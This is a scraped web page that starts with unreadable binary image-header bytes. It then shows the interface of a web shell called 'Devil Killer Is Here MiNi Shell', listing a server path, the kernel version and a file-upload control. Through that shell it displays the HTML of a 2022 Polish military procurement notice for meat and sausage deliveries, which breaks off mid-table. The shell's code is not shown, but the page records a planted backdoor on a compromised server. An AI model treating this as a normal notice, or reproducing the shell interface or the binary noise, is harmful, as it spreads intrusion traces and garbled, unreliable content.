JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220812/0030342801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP I DOSTAWY MIĘSA ORAZ WĘDLIN W 2022 R. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP I DOSTAWY MIĘSA ORAZ WĘDLIN W 2022 R. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f49ea1cc-1953-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00303428</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00072520/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 ZAKUP I DOSTAWA MIĘSA</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/21wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane <br/>w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym <br/>z poziomu modułu E-learning dla wszystkich użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/><br/>	Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/>	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „zakup <br/>i dostawy mięsa oraz wędlin w 2022 r.” nr postępowania 24/SZP/2022;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania. <br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">j.w.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21WOG-SZP.2712.24.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawy mięsa oraz wędlin w 2022 r. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1,2a i 4 do SWZ.<br/>ILOŚCI MINIMALNE<br/>Lp.	Wyszczególnienie<br/>przedmiotu zamówienia	J.m.	Miejsca dostaw	<br/>Razem<br/>(4+5+6+7)<br/> Grupa Zabezpieczenia <br/>21 WOG Elbląg, <br/>ul. Łęczycka 10-12	Grupa Zabezpieczenia <br/>21 WOG Braniewo, <br/>ul. Sikorskiego 41	Grupa Zabezpieczenia <br/>21 WOG Bartoszyce, <br/>ul. Wojska Polskiego 4	Grupa Zabezpieczenia <br/>21 WOG Morąg, <br/>Al. Wojska Polskiego 16	<br/>1	2	3	4	5	6	7	8<br/>1. Antrykot wołowy b/k kręg.	kg	20	20	20	20	80<br/>2. Wołowina ekstra	kg	20	20	20	20	80<br/>3. Polędwica wieprzowa kg	25	25	25	25	100<br/>4. Wołowina zrazowa b/k	kg	25	25	25	25	100<br/>5. Karkówka wieprzowa b/k	kg	90	90	90	90	360<br/>6. Łopatka wieprzowa b/k	kg	90	90	90	90	360<br/>7. Schab wieprzowy b/k	kg	85	85	85	85	340<br/>8. Boczek surowy b/k	kg	25	25	25	25	100<br/>9. Żeberka wieprzowe	kg	45	45	45	45	180<br/>10. Szynka wieprzowa b/k	kg	50	50	50	50	200<br/>11. Mięso wieprzowe od szynki b/k drobne	kg	50	50	50	50	200<br/>12. Golonka wieprzowa z/k	kg	10	10	10	10	40<br/>13. Wątroba wieprzowa	kg	17	17	17	17	68<br/>14. Pasztetowa	kg	20	20	20	20	80<br/>15. Salceson włoski	kg	15	15	15	15	60<br/>16. Salceson ozorkowy	kg	15	15	15	15	60<br/>17. Kaszanka z kaszy gryczanej	kg	20	20	20	20	80<br/>18. Kiełbasa salami	kg	20	20	20	20	80<br/>19. Kiełbasa myśliwska	kg	20	20	20	20	80<br/>20. Kiełbasa jałowcowa	kg	20	20	20	20	80<br/>21. Kiełbasa parówkowa kg	25	25	25	25	100<br/>22. Parówki z szynki	kg	25	25	25	25	100<br/>23. Mortadela kg	20	20	20	20	80<br/>24. Kiełbasa biała parzona kg	25	25	25	25	100<br/>25. Kiełbasa podlaska kg	25	25	25	25	100<br/>26. Kiełbasa wiejska	kg	20	20	20	20	80<br/>27. Kiełbasa śląska kg	25	25	25	25	100<br/>28. Kiełbasa toruńska kg	25	25	25	25	100<br/>29. Kiełbasa zwyczajna kg	40	40	40	40	160<br/>30. Kiełbasa krakowska parzona kg	20	20	20	20	80<br/>31. Kiełbasa szynkowa wieprzowa kg	25	25	25	25	100<br/>32. Kiełbasa krakowska sucha	kg	20	20	20	20	80<br/>33. Kiełbasa żywiecka	kg	20	20	20	20	80<br/>34. Kabanosy	kg	25	25	25	25	100<br/>35. Baleron	kg	20	20	20	20	80<br/>36. Salami	kg	20	20	20	20	80<br/>37. Polędwica wieprzowa wędzona kg	20	20	20	20	80<br/>38. Szynka wieprzowa wędzona	kg	20	20	20	20	80<br/>39. Szynka wieprzowa gotowana	kg	25	25	25	25	100<br/>40. Szynka wieprzowa konserwowa	kg	25	25	25	25	100<br/>41. Boczek wędzony parzony b/k	kg	20	20	20	20	80<br/>42. Rolada z boczku	kg	20	20	20	20	80<br/>43. Pasztet wieprzowy pieczony	kg	20	20	20	20	80<br/>44. Golonka wieprzowa	kg	20	20	20	20	80<br/>45. Ogonówka	kg	20	20	20	20	80<br/>46. Schab pieczony	kg	20	20	20	20	80<br/>47. Flaki wołowe krojone blanszowane	kg	10	10	10	10	40<br/><br/>ILOŚCI MAKSYMALNE<br/>Lp.	Wyszczególnienie<br/>przedmiotu zamówienia	J.m.	Miejsca dostaw	<br/>Razem<br/>(4+5+6+7)<br/> Grupa Zabezpieczenia <br/>21 WOG Elbląg, <br/>ul. Łęczycka 10-12	Grupa Zabezpieczenia <br/>21 WOG Braniewo, <br/>ul. Sikorskiego 41	Grupa Zabezpieczenia <br/>21 WOG Bartoszyce, <br/>ul. Wojska Polskiego 4	Grupa Zabezpieczenia <br/>21 WOG Morąg, <br/>Al. Wojska Polskiego 16	<br/>1	2	3	4	5	6	7	8<br/>1. Antrykot wołowy b/k kręg.	kg	60	60	60	60	240<br/>2. Wołowina ekstra	kg	60	60	60	60	240<br/>3. Polędwica wieprzowa kg	75	75	75	75	300<br/>4. Wołowina zrazowa b/k	kg	75	75	75	75	300<br/>5. Karkówka wieprzowa b/k	kg	270	270	270	270	1080<br/>6. Łopatka wieprzowa b/k	kg	270	270	270	270	1080<br/>7. Schab wieprzowy b/k	kg	255	255	255	255	1020<br/>8. Boczek surowy b/k	kg	75	75	75	75	300<br/>9. Żeberka wieprzowe	kg	135	135	135	135	540<br/>10. Szynka wieprzowa b/k	kg	150	150	150	150	600<br/>11. Mięso wieprzowe od szynki b/k drobne	kg	150	150	150	150	600<br/>12. Golonka wieprzowa z/k	kg	30	30	30	30	120<br/>13. Wątroba wieprzowa	kg	51	51	51	51	204<br/>14. Pasztetowa	kg	60	60	60	60	240<br/>15. Salceson włoski	kg	45	45	45	45	180<br/>16. Salceson ozorkowy	kg	45	45	45	45	180<br/>17. Kaszanka z kaszy gryczanej	kg	60	60	60	60	240<br/>18. Kiełbasa salami	kg	60	60	60	60	240<br/>19. Kiełbasa myśliwska	kg	60	60	60	60	240<br/>20. Kiełbasa jałowcowa	kg	60	60	60	60	240<br/>21. Kiełbasa parówkowa kg	75	75	75	75	300<br/>22. Parówki z szynki	kg	75	75	75	75	300<br/>23. Mortadela kg	60	60	60	60	240<br/>24. Kiełbasa biała parzona kg	75	75	75	75	300<br/>25. Kiełbasa podlaska kg	75	75	75	75	300<br/>26. Kiełbasa wiejska	kg	60	60	60	60	240<br/>27. Kiełbasa śląska kg	75	75	75	75	300<br/>28. Kiełbasa toruńska kg	75	75	75	75	300<br/>29. Kiełbasa zwyczajna kg	120	120	120	120	480<br/>30. Kiełbasa krakowska parzona kg	60	60	60	60	240<br/>31. Kiełbasa szynkowa wieprzowa kg	75	75	75	75	300<br/>32. Kiełbasa krakowska sucha	kg	60	60	60	60	240<br/>33. Kiełbasa żywiecka	kg	60	60	60	60	240<br/>34. Kabanosy	kg	75	75	75	75	300<br/>35. Baleron	kg	60	60	60	60	240<br/>36. Salami	kg	60	60	60	60	240<br/>37. Polędwica wieprzowa wędzona kg	60	60	60	60	240<br/>38. Szynka wieprzowa wędzona	kg	60	60	60	60	240<br/>39. Szynka wieprzowa gotowana	kg	75	75	75	75	300<br/>40. Szynka wieprzowa konserwowa	kg	75	75	75	75	300<br/>41. Boczek wędzony parzony b/k	kg	60	60	60	60	240<br/>42. Rolada z boczku	kg	60	60	60	60	240<br/>43. Pasztet wieprzowy pieczony	kg	60	60	60	60	240<br/>44. Golonka wieprzowa	kg	60	60	60	60	240<br/>45. Ogonówka	kg	60	60	60	60	240<br/>46. Schab pieczony	kg	60	60	60	60	240<br/>47. Flaki wołowe krojone blanszowane	kg	30	30	30	30	120<br/><br/>Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Szczegółowe ilości maksymalne zostały określone w Opisie Przedmiotu Zamówienia i Formularzu Cenowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15111100-0 - Wołowina</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15113000-3 - Wieprzowina</p> <p class="mb-0">15114000-0 - Podroby</p> <p class="mb-0">15131130-5 - Wędliny</p> <p class="mb-0">15131134-3 - Kaszanka i inne wędliny krwiste</p> <p class="mb-0">15131210-0 - Szynka wędzona</p> <p class="mb-0">15131000-5 - Konserwy i przetwory z mięsa</p> <p class="mb-0">15131200-7 - Mięso suszone, solone, wędzone lub marynowane</p> <p class="mb-0">15131310-1 - Pasztety</p> <p class="mb-0">15131120-2 - Produkty wędliniarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu<br/>tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji<br/>asortymentowej ilości minimalne i maksymalne stanowią taką samą wielkość oznacza to, że dla<br/>danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant dostaw - 40%<br/>2. Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant dostaw”<br/><br/>3. W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = --------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/>W kryterium „Przyjęty do realizacji wariant dostaw” oferta uzyska:<br/>• 0 pkt za WARIANT I – dostawy w każdy wtorek i czwartek(w przypadku, gdy <br/>w ww. dzień wypada dzień świąteczny dostawa w poprzednim dniu roboczym)<br/>• 20 pkt za WARIANT II – dostawy w każdy wtorek, czwartek i piątek <br/>(w przypadku, gdy w ww. dzień wypada dzień świąteczny dostawa w poprzednim dniu roboczym)<br/>• 40 pkt za WARIANT III – dostawy w każdy poniedziałek, wtorek, czwartek <br/>i piątek (w przypadku, gdy w ww. dzień wypada dzień świąteczny dostawa <br/>w poprzednim dniu roboczym)<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/><br/>UWAGA:<br/>1) Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>2) W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT I, w związku z tym otrzyma 0 pkt.<br/>3) Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty;<br/>4) Dostawy do magazynów Zamawiającego w godz. 8:00-13:30, w piątek 8:00-12:00.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawy mięsa oraz wędlin w 2022 r. Szczegółowy opis<br/>przedmiotu zamówienia zawiera załącznik nr 1,2a i 4 do SWZ.<br/><br/>ILOŚCI MINIMALNE<br/><br/>Lp.	Wyszczególnienie<br/>przedmiotu zamówienia	J.m.	Miejsca dostaw	<br/>Razem<br/>(4+5+6+7)<br/> Grupa Zabezpieczenia <br/>21 WOG Elbląg, <br/>ul. Królewiecka 130<br/>ul. Łęczycka 10-12	Grupa Zabezpieczenia <br/>21 WOG Braniewo, <br/>ul. Sikorskiego 41	Grupa Zabezpieczenia <br/>21 WOG Bartoszyce, <br/>ul. Wojska Polskiego 4	Grupa Zabezpieczenia <br/>21 WOG Morąg, <br/>Al. Wojska Polskiego 16	<br/>1	2	3	4	5	6	7	8<br/>1. Noga z kurczaka mrożona	kg	20	20	20	20	80<br/>2. Noga z kurczaka	kg	50	50	50	50	200<br/>3. Filet z piersi kurczaka mrożony	kg	20	20	20	20	80<br/>4. Filet z piersi kurczaka	kg	50	50	50	50	200<br/>5. Filet z piersi indyka mrożony	kg	20	20	20	20	80<br/>6. Filet z piersi indyka	kg	40	40	40	40	160<br/>7. Filet z piersi kaczki	kg	5	5	5	5	20<br/>8. Skrzydełka z kurczaka	kg	30	30	30	30	120<br/>9. Wątroba z kurczaka	kg	30	30	30	30	120<br/>10. Żołądki kurczaka	kg	30	30	30	30	120<br/>11. Kabanosy drobiowe	kg	25	25	25	25	100<br/>12. Kiełbasa szynkowa drobiowa	kg	30	30	30	30	120<br/>13. Parówki z fileta z kurczaka	kg	30	30	30	30	120<br/>14. Szynka drobiowa	kg	25	25	25	25	100<br/>15. Szynka z indyka	kg	30	30	30	30	120<br/>16. Mortadela drobiowa	kg	30	30	30	30	120<br/><br/><br/>ILOŚCI MAKSYMALNE<br/>Lp.	Wyszczególnienie<br/>przedmiotu zamówienia	J.m.	Miejsca dostaw	<br/>Razem<br/>(4+5+6+7)<br/> Grupa Zabezpieczenia <br/>21 WOG Elbląg, <br/>ul. Królewiecka 